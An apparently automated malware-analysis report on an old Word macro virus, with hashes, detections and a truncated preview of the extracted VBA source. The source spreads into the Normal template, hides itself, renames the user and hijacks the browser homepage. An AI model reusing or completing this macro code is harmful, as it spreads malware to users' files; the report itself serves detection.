Office (OLE) malware analysis — malicious · 03acda5eb3d8e16f

MALICIOUS

Office (OLE)

50.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: c76339c7964bff6b10db46813f23f627 SHA-1: 0d029eab61796ac8fa7b19b7cd7bf2ff5a39ac21 SHA-256: 03acda5eb3d8e16fefcfbc9a96e51dcf37cdb9de4697cfe0fd3b3942c619322f

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, including AutoOpen and Auto_Close, which are commonly used for malicious purposes. The extracted macro code appears to be attempting to modify browser preferences, specifically setting the startup homepage to 'http://www.escalix.com/freepage/angel'. This suggests an attempt to redirect users to a malicious site or download further payloads. The ClamAV detections further confirm its malicious nature.

Heuristics 6

ClamAV: Doc.Trojan.Opey-18 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Opey-18
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://www.escalix.com/freepage/angel In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	24731 bytes
SHA-256: `221b9db7e4441ff1753a5e449bf11b3b8063dc3ee704ef7311aea34321501978`
Detection ClamAV: Doc.Trojan.Opey-11 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Angel_2" '// Netscape User Preferences '// This is a generated file! Do not edit.' ' 'user_pref("browser.startup.homepage", "http://www.escalix.com/freepage/angel"); 'user_pref("browser.startup.homepage_override", false); 'user_pref("browser.wfe.ignore_def_check", true); 'user_pref("browser.window_rect", "0,0,632,480"); 'user_pref("custtoolbar.personal_toolbar_folder", "Personal Toolbar Folder"); 'user_pref("ldap_2.servers.infospace.csid", "UTF-8"); 'user_pref("ldap_2.servers.infospace.filename", "infospace.na2"); 'user_pref("ldap_2.servers.infospace.replication.lastChangeNumber", 0); 'user_pref("ldap_2.servers.netcenter.csid", "UTF-8"); 'user_pref("ldap_2.servers.netcenter.filename", "netcenter.na2"); 'user_pref("ldap_2.servers.netcenter.replication.lastChangeNumber", 0); 'user_pref("ldap_2.servers.pab.csid", "iso-8859-1"); 'user_pref("ldap_2.servers.pab.filename", "pab.na2"); 'user_pref("ldap_2.servers.pab.replication.lastChangeNumber", 0); 'user_pref("ldap_2.servers.verisign.csid", "UTF-8"); 'user_pref("ldap_2.servers.verisign.filename", "verisign.na2"); 'user_pref("ldap_2.servers.verisign.replication.lastChangeNumber", 0); 'user_pref("ldap_2.version", 2); 'user_pref("taskbar.x", 634); 'user_pref("taskbar.y", 5); Sub AutoOpen() ' coded by D@rkByte Call stealth ' Undetected by Norton Anti-virus 5.0, Dr. Sol. Antivirus On Error Resume Next ' Tbav, and other shits Call clascopy ' Copyaright 1999 ActiveDocument.Save ' Comments or Suggestions mailto: avenging.angel@mailcity.com End Sub 'Payload: change the Owner's Computer name Sub AutoExec() ' on friday it will ask a question to be answered Call stealth ' after 9/9/99 printing will print all the pages on a document On Error Resume Next ' changes the home of the internet explorer to my site Call clascopy ActiveDocument.Save End Sub Sub FileSaveAs() On Error Resume Next Call clascopy Application.UserName = "Another infected of Angel Virus" Application.UserAddress = "Hacker From Batangas" Dialogs(wdDialogFileSaveAs).Show End Sub Sub FilePageSetup() On Error Resume Next Call clascopy Dialogs(wdDialogFilePageSetup).Show End Sub Sub FilePrint() On Error Resume Next Call clascopy Dialogs(wdDialogFilePrint).Show End Sub Sub FileOpen() On Error Resume Next Dialogs(wdDialogFileOpen).Show Call clascopy ActiveDocument.Save End Sub Sub AutoClose() On Error Resume Next Call clascopy End Sub Sub AutoExit() On Error Resume Next Call clascopy Application.Quit End Sub Sub FileSave() On Error Resume Next Call clascopy ActiveDocument.Save End Sub Sub FileClose() On Error Resume Next Call clascopy If ActiveDocument.Words(1) <> "" _ And ActiveDocument.Saved = False Then ActiveDocument.Save End If ActiveDocument.Close End Sub Sub FileExit() On Error Resume Next Call clascopy If ActiveDocument.Words(1) <> "" And _ ActiveDocument.Saved = False Then ActiveDocument.Save End If Call payload Application.Quit End Sub Sub FileNew() On Error Resume Next Dialogs(wdDialogFileNew).Show Call clascopy End Sub Sub clascopy() On Error Resume Next Call stealth infected = False For A_A = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1 modname = NormalTemplate.VBProject.VBComponents(A_A).Name If modname = "Angel_2" Then infected = True If (modname <> "Angel_2") And (modname <> "ThisDocument") Then Application.Org ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.